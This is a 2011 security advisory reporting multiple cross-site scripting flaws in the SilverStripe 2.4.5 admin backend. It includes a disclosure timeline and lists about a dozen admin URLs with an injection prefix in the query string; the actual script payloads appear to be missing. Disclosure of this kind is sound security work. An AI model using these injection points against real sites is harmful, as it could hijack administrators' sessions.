Advisory: SilverStripe 2.4.5 Multiple backend Cross-site scripting vulnerabilities Advisory ID: SSCHADV2011-024 Author: Stefan Schurtz Affected Software: Successfully tested on SilverStripe 2.4.5 Vendor URL: http://www.silverstripe.com/ Vendor Status: informed CVE-ID: - ========================== Vulnerability Description: ========================== SilverStripe 2.4.5 backend is prone to multiple Cross-site scripting vulnerabilities ================== Technical Details: ================== Backend - XSS http:///SilverStripe-v2.4.5/admin/reports/?'" http:///SilverStripe-v2.4.5/admin/comments/?'" http:///SilverStripe-v2.4.5/admin/?'" http:///SilverStripe-v2.4.5/admin/show/4?'" http:///SilverStripe-v2.4.5/admin/show/2?'" http:///SilverStripe-v2.4.5/admin/show/root?'" http:///SilverStripe-v2.4.5/admin/show/3?'" http:///SilverStripe-v2.4.5/admin/show/?'" http:///SilverStripe-v2.4.5/admin/assets/?'" http:///SilverStripe-v2.4.5/admin/show/1?'" http:///SilverStripe-v2.4.5/admin/show/5?'" http:///SilverStripe-v2.4.5/admin/security/?'" ========= Solution: ========= - ==================== Disclosure Timeline: ==================== 05-Oct-2011 - informed developers 06-Oct-2011 - release date of this security advisory 08-Oct-2011 - post on BugTraq ======== Credits: ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References: =========== http://www.silverstripe.com/ http://www.rul3z.de/advisories/SSCHADV2011-024.txt